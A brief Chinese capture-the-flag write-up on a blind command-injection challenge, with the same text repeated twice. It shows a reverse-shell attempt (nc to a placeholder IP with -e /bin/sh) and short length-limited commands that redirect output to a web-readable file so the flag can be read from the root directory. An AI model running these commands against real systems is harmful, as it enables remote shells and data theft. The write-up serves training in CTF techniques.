启动环境
无回显命令执行
想到反弹shell
尝试写
nc xxx.xxx.xxx.xxx 9000 -e /bin/sh
执行的时候发现太长
那试试能不能重定向写文件
ls >1
发现是可以的,访问api/1 路径
发现确实是写入了
那么找找看flag位置,盲猜一手根目录
ls />1
确实在啊
那么试试能不能较短的语句给他带出来
nl /*>1
刚好满足长度,多一个字符就执行失败
启动环境
无回显命令执行
想到反弹shell
尝试写
nc xxx.xxx.xxx.xxx 9000 -e /bin/sh
执行的时候发现太长
那试试能不能重定向写文件
ls >1
发现是可以的,访问api/1 路径
发现确实是写入了
那么找找看flag位置,盲猜一手根目录
ls />1
确实在啊
那么试试能不能较短的语句给他带出来
nl /*>1
刚好满足长度,多一个字符就执行失败